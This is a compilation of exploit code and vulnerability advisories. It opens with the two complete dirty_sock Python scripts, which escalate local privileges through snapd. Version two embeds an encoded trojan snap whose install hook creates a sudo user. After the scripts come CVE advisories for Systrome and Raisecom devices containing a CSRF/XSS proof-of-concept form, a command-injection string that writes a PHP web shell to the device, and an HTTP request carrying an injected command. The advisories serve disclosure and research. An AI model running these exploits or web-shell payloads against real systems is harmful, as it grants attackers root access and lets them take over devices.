#!/usr/bin/env python3

"""
# dirty_sock: Privilege Escalation in Ubuntu (via snapd)
In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.

You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
```
$ snap version
...
snapd   2.37.1
...
```

# Usage
## Version One (use in most cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value.

Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.

To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded):

```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"

[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!

[Script will automatically ssh to localhost with the SSH key here]
```

## Version Two (use in special cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.

dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.

As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.

This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.

Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.

To exploit, simply run the script with no arguments on a vulnerable system.

```
python3 ./dirty_sockv2.py

[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success! You can now `su` to the following account and use sudo:
   username: dirty_sock
   password: dirty_sock
********************

```


# Troubleshooting
If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.

Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).

Please open issues for anything weird.

# Disclosure Info
The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.

I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.

Public advisory links:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/


Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip
"""

"""
Local privilege escalation via snapd, affecting Ubuntu and others.

v1 of dirty_sock leverages the /v2/create-user API to create a new local user
based on information in an Ubuntu SSO profile. It requires outbound Internet
access as well as the SSH service running and available from localhost.

Try v2 in more restricted environments, but use v1 when possible.

Before running v1, you need to:
    - Create an Ubuntu SSO account (https://login.ubuntu.com/)
    - Login to that account and ensure you have your public SSH key configured
      in your profile.

Run exploit like this:
    dirty_sock.py -u <account email> -k <ssh priv key file>

A new local user with sudo rights will be created using the username from your
Ubuntu SSO profile. The SSH public key will be copied into this users profile.

The exploit will automatically SSH into localhost when finished.

Research and POC by initstring (https://github.com/initstring/dirty_sock)
"""

import argparse
import string
import random
import socket
import re
import sys
import os

BANNER = r'''
      ___  _ ____ ___ _   _     ____ ____ ____ _  _ 
      |  \ | |__/  |   \_/      [__  |  | |    |_/  
      |__/ | |  \  |    |   ___ ___] |__| |___ | \_ 
                       (version 1)

//=========[]==========================================\\
|| R&D     || initstring (@init_string)                ||
|| Source  || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock     ||
\\=========[]==========================================//

'''


def process_args():
"""Handles user-passed parameters"""
    parser = argparse.ArgumentParser()
    parser.add_argument('--username', '-u', type=str, action='store',
                        required=True, help='Your Ubuntu One account email.')
    parser.add_argument('--key', '-k', type=str, action='store',
                        required=True, help='Full path to the ssh privkey'
' matching the pubkey in your Ubuntu One account.')

    args = parser.parse_args()

    if not os.path.isfile(args.key):
        print("[!] That key file does not exist. Please try again.")
        sys.exit()

    return args

def create_sockfile():
"""Generates a random socket file name to use"""
    alphabet = string.ascii_lowercase
    random_string = ''.join(random.choice(alphabet) for i in range(10))
    dirty_sock = ';uid=0;'

    # This is where we slip on the dirty sock. This makes its way into the
    # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
    # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
    sockfile = '/tmp/' + random_string + dirty_sock

    print("[+] Slipped dirty sock on random socket file: " + sockfile)

    return sockfile

def bind_sock(sockfile):
"""Binds to a local file"""
    # This exploit only works if we also BIND to the socket after creating
    # it, as we need to inject the dirty sock as a remote peer in the
    # socket's ancillary data.
    print("[+] Binding to socket file...")
    client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client_sock.bind(sockfile)

    # Connect to the snap daemon
    print("[+] Connecting to snapd API...")
    client_sock.connect('/run/snapd.socket')

    return client_sock

def add_user(args, client_sock):
"""Main exploit function"""
    post_payload = ('{"email": "' + args.username +
'", "sudoer": true, "force-managed": true}')
    http_req = ('POST /v2/create-user HTTP/1.1\r\n'
'Host: localhost\r\n'
'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
                + post_payload)

    # Send our payload to the snap API
    print("[+] Sending payload...")
    client_sock.sendall(http_req.encode("utf-8"))

    # Receive the data and extract the JSON
    http_reply = client_sock.recv(8192).decode("utf-8")

    # Try to extract a username from the valid reply
    regex = re.compile(r'"status":"OK","result":{"username":"(.*?)"')
    username = re.findall(regex, http_reply)

    # If exploit was not successful, give details and exit
    if '"status":"Unauthorized"' in http_reply:
        print("[!] System may not be vulnerable, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    if 'cannot find user' in http_reply:
        print("[!] Could not find user in the snap store... did you follow"
" the instructions?")
        print("Here is the API reply:")
        print(http_reply)
        sys.exit()

    if not username:
        print("[!] Something went wrong... Here is the API reply:")
        print(http_reply)
        sys.exit()

    # SSH into localhost with our new root account
    print("[+] Success! Enjoy your new account with sudo rights!")
    cmd1 = 'chmod 600 ' + args.key
    cmd2 = 'ssh ' + username[0] + '@localhost -i ' + args.key
    os.system(cmd1)
    os.system(cmd2)

    print("[+] Hope you enjoyed your stay!")
    sys.exit()



def main():
"""Main program function"""

    # Gotta have a banner...
    print(BANNER)

    # Process the required arguments
    args = process_args()

    # Create a random name for the dirty socket file
    sockfile = create_sockfile()

    # Bind the dirty socket to the snapdapi
    client_sock = bind_sock(sockfile)

    # Exploit away...
    add_user(args, client_sock)

    # Remove the dirty socket file
    os.remove(sockfile)


if __name__ == '__main__':
    main()

#!/usr/bin/env python3

"""
# dirty_sock: Privilege Escalation in Ubuntu (via snapd)
In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.

You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
```
$ snap version
...
snapd   2.37.1
...
```

# Usage
## Version One (use in most cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value.

Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.

To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded):

```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"

[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!

[Script will automatically ssh to localhost with the SSH key here]
```

## Version Two (use in special cases)
This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.

dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.

As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.

This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.

Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.

To exploit, simply run the script with no arguments on a vulnerable system.

```
python3 ./dirty_sockv2.py

[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success! You can now `su` to the following account and use sudo:
   username: dirty_sock
   password: dirty_sock
********************

```


# Troubleshooting
If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.

Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).

Please open issues for anything weird.

# Disclosure Info
The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.

I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.

Public advisory links:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/


Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip
"""

"""
Local privilege escalation via snapd, affecting Ubuntu and others.

v2 of dirty_sock leverages the /v2/snaps API to sideload an empty snap
with an install hook that creates a new user.

v1 is recommended is most situations as it is less intrusive.

Simply run as is, no arguments, no requirements. If the exploit is successful,
the system will have a new user with sudo permissions as follows:
  username: dirty_sock
  password: dirty_sock

You can execute su dirty_sock when the exploit is complete. See the github page
for troubleshooting.

Research and POC by initstring (https://github.com/initstring/dirty_sock)
"""

import string
import random
import socket
import base64
import time
import sys
import os

BANNER = r'''
      ___  _ ____ ___ _   _     ____ ____ ____ _  _ 
      |  \ | |__/  |   \_/      [__  |  | |    |_/  
      |__/ | |  \  |    |   ___ ___] |__| |___ | \_ 
                       (version 2)

//=========[]==========================================\\
|| R&D     || initstring (@init_string)                ||
|| Source  || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock     ||
\\=========[]==========================================//

'''


# The following global is a base64 encoded string representing an installable
# snap package. The snap itself is empty and has no functionality. It does,
# however, have a bash-script in the install hook that will create a new user.
# For full details, read the blog linked on the github page above.
TROJAN_SNAP = ('''
aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
               + 'A' * 4256 + '==')

def check_args():
"""Return short help if any args given"""
    if len(sys.argv) > 1:
        print("\n\n"
"No arguments needed for this version. Simply run and enjoy."
"\n\n")
        sys.exit()

def create_sockfile():
"""Generates a random socket file name to use"""
    alphabet = string.ascii_lowercase
    random_string = ''.join(random.choice(alphabet) for i in range(10))
    dirty_sock = ';uid=0;'

    # This is where we slip on the dirty sock. This makes its way into the
    # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
    # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
    sockfile = '/tmp/' + random_string + dirty_sock

    print("[+] Slipped dirty sock on random socket file: " + sockfile)

    return sockfile

def bind_sock(sockfile):
"""Binds to a local file"""
    # This exploit only works if we also BIND to the socket after creating
    # it, as we need to inject the dirty sock as a remote peer in the
    # socket's ancillary data.
    print("[+] Binding to socket file...")
    client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client_sock.bind(sockfile)

    # Connect to the snap daemon
    print("[+] Connecting to snapd API...")
    client_sock.connect('/run/snapd.socket')

    return client_sock

def delete_snap(client_sock):
"""Deletes the trojan snap, if installed"""
    post_payload = ('{"action": "remove",'
'"snaps": ["dirty-sock"]}')
    http_req = ('POST /v2/snaps HTTP/1.1\r\n'
'Host: localhost\r\n'
'Content-Type: application/json\r\n'
'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
                + post_payload)

    # Send our payload to the snap API
    print("[+] Deleting trojan snap (and sleeping 5 seconds)...")
    client_sock.sendall(http_req.encode("utf-8"))

    # Receive the data and extract the JSON
    http_reply = client_sock.recv(8192).decode("utf-8")

    # Exit on probably-not-vulnerable
    if '"status":"Unauthorized"' in http_reply:
        print("[!] System may not be vulnerable, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    # Exit on failure
    if 'status-code":202' not in http_reply:
        print("[!] Did not work, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    # We sleep to allow the API command to complete, otherwise the install
    # may fail.
    time.sleep(5)

def install_snap(client_sock):
"""Sideloads the trojan snap"""

    # Decode the base64 from above back into bytes
    blob = base64.b64decode(TROJAN_SNAP)

    # Configure the multi-part form upload boundary here:
    boundary = '------------------------f8c156143a1caf97'

    # Construct the POST payload for the /v2/snap API, per the instructions
    # here: https://github.com/snapcore/snapd/wiki/REST-API
    # This follows the 'sideloading' process.
    post_payload = '''
--------------------------f8c156143a1caf97
Content-Disposition: form-data; name="devmode"

true
--------------------------f8c156143a1caf97
Content-Disposition: form-data; name="snap"; filename="snap.snap"
Content-Type: application/octet-stream

''' + blob.decode('latin-1') + '''
--------------------------f8c156143a1caf97--'''


    # Multi-part forum uploads are weird. First, we post the headers
    # and wait for an HTTP 100 reply. THEN we can send the payload.
    http_req1 = ('POST /v2/snaps HTTP/1.1\r\n'
'Host: localhost\r\n'
'Content-Type: multipart/form-data; boundary='
                 + boundary + '\r\n'
'Expect: 100-continue\r\n'
'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n')

    # Send the headers to the snap API
    print("[+] Installing the trojan snap (and sleeping 8 seconds)...")
    client_sock.sendall(http_req1.encode("utf-8"))

    # Receive the initial HTTP/1.1 100 Continue reply
    http_reply = client_sock.recv(8192).decode("utf-8")

    if 'HTTP/1.1 100 Continue' not in http_reply:
        print("[!] Error starting POST conversation, here is the reply:\n\n")
        print(http_reply)
        sys.exit()

    # Now we can send the payload
    http_req2 = post_payload
    client_sock.sendall(http_req2.encode("latin-1"))

    # Receive the data and extract the JSON
    http_reply = client_sock.recv(8192).decode("utf-8")

    # Exit on failure
    if 'status-code":202' not in http_reply:
        print("[!] Did not work, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    # Sleep to allow time for the snap to install correctly. Otherwise,
    # The uninstall that follows will fail, leaving unnecessary traces
    # on the machine.
    time.sleep(8)

def print_success():
"""Prints a success message if we've made it this far"""
    print("\n\n")
    print("********************")
    print("Success! You can now `su` to the following account and use sudo:")
    print("   username: dirty_sock")
    print("   password: dirty_sock")
    print("********************")
    print("\n\n")


def main():
"""Main program function"""

    # Gotta have a banner...
    print(BANNER)

    # Check for any args (none needed)
    check_args()

    # Create a random name for the dirty socket file
    sockfile = create_sockfile()

    # Bind the dirty socket to the snapdapi
    client_sock = bind_sock(sockfile)

    # Delete trojan snap, in case there was a previous install attempt
    delete_snap(client_sock)

    # Install the trojan snap, which has an install hook that creates a user
    install_snap(client_sock)

    # Delete the trojan snap
    delete_snap(client_sock)

    # Remove the dirty socket file
    os.remove(sockfile)

    # Congratulate the lucky hacker
    print_success()


if __name__ == '__main__':
    main()

=====================================================
Authenticated XSRF leads to complete Account Takeover
=====================================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated XSRF leads to complete account takeover in all SYSTORME ISG Products.
CVE ID:- CVE-2018-19525
Author: Kaustubh G. Padwad
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
   1.ISG-600C
   2.ISG-600H
   3.ISG-800W


Tested Version: : ISG-V1.1-R2.1_TRUNK-20180914.bin(Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-002


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and smal
 l enterprises, branch interconnection, and chain enterprises.

Description: 
============
An issue was discovered on Systrome ISG-600C,ISG-600H, and ISG-800W 1.1-R2.1_TRUNK-20180914.bin devices. There is CSRF via /ui/?g=obj_keywords_add and/ui/?g=obj_keywords_addsave
with resultant XSS because of a lack of csrf token validation.

Additional Information
======================
The web interface of the ISG-Firewalls does not validate the csrftoken,and the ?g=obj_keywords_add page does not properly sanitize the
user input which leads to xss, By combining this two attack we can form the XSRF request which leads to complete account takeover using XSRF.

[Vulnerability Type]
====================
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.1.200/ui/?g=obj_keywords_add" method="POST">
<input type="hidden" name="name" value="xsrf" />
<input type="hidden" name="description" value="<svg><script>//" />
<input type="hidden" name="NewLine;confirm(1338);</script </svg>" value="" />
<input type="hidden" name="keyword" value="xsrf" />
<input type="hidden" name="submit_post" value="obj_keywords_addsave" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



[Affected Component]
obj_keywords_add ,obj_keywords_addsave, CSRF Vulnerabilities,

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Code execution]
true

------------------------------------------

[Attack Vectors]
once victim open the crafted url the device will get compromise

Mitigation
==========

vendr is working on the same he will submit the solution maybe by december 1st weak.

Disclosure: 
===========
02-Nov-2018 Discoverd the Vulnerability
15-Nov-2018 Reported to vendor 
25-Nov-2018 Requested for CVE/Cve's.
26-Nov-2018 CVE-Assign 


[Vendor of Product]
Systrome Networks (http://systrome.com/about/)

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title : Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7383
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
   1.ISG-600C
   2.ISG-600H
   3.ISG-800W


Tested Version: : ISG-V1.1-R2.1_TRUNK-20181105.bin(Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-003


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and smal
 l enterprises, branch interconnection, and chain enterprises.

Description: 
============
An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with firmware V1.1-R2.1_TRUNK-20181105.bin.
A shell command injection occurs by editing the description of an ISP file. The file network/isp/isp_update_edit.php does not properly validate user input, which leads to shell command injection via the des parameter.

[Additional_information]

The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell command injection.
below is the vulnerable code snipet  "<td><input name="des" id="des" value="<?php echo $item['des'];?>" type="text"<?php echo $item['des'];?> size="50" maxlength="<?php echo XML_MAX_DESC_LEN;?>"/><"

[VulnerabilityType Other]
Authenticated Shell Command Injection


[Affected Component]
The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell command injection.
below is the vulnerable code snippet  "<td><input name="des" id="des" value="<?php echo $item['des'];?>" type="text"<?

[Attack Type]
Local


[Impact Code execution]
true


[Attack Vectors]

visit the url http://device_ip/network/isp/isp_update_edit.php?pv=ISP_INTL.dat
adding the strings below will add a php system command shell in the webroot of the device:
'`echo PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4KCg== | base64 -d > /usr/local/wwwroot/cmd.php`'

the php system shell can then be accessed via browser, e.g: http://device_ip/cmd.php?cmd=ifconfig


Mitigation
==========

This issue is fixed in ISG-V1.1-R2.1_TRUNK-20181229.bin

Disclosure: 
===========
10-Dec-2018 Discoverd the Vulnerability
10-DEC-2018 Reported to vendor 
04-JAN-2019 Recived the fixed from vendor
04-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE ID Assign.
08-FEB-2019 Advisiory Published.

[Discoverer]
* Kaustubh Padwad, 
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7384.
Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

 ISCOM HT803G-U
 ISCOM HT803G-W
 ISCOM HT803G-1GE
 ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-005


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description: 
============

 An authenticated shell command injection issue has been discovered in  Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version
 ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call
 inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the device.

Additional_information
======================

The value of fmgpon_loid parameter is parse to system call in implimentation of application code inside boa binary and since their is no user input validation this leads to authenticated code execution on device


Vulnerability Class:
====================
Authenticated Shell Command Injection

Attack Type
===========
 Local


Impact Code execution
=====================
 true

Attack Vectors
==============
 To exploit this vulnerability one must have to visit the crafted page or have to parse the proper crafted request to the device



How to Reproduce: (POC):
========================

POST /boaform/admin/formgponConf HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/gpon.asp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure: 
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor 
10-Dec-2018 Recived confirmation from vendor regarding fix
04-JAN-2019 Request for the CVE-ID
04-FEB-2018: CVE assigned 

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad

Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

 ISCOM HT803G-U
 ISCOM HT803G-W
 ISCOM HT803G-1GE
 ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-006


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description: 
============
An authenticated shell command injection issue has been discovered in  Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with thefirmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the newpass and confpass parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user input validation, this leads to authenticated code execution on the device.

[Additional_information]

The value of newpass and confpass in /bin/WebMGR  parameter is parse to system call in the Firmware  and since their is no user input validation this leads to authenticated code execution on device

Vulnerability Class:
====================
Authenticated Shell Command Injection


Attack Type
===========
 Local


Impact Code execution
=====================
 true


Attack Vectors
==============
TO exploit this vulnerability one needs to parse the correct request to the device or they one needs to visit the crafted Page


How to Reproduce: (POC):
========================

curl -i -s -k  -X 'POST' \
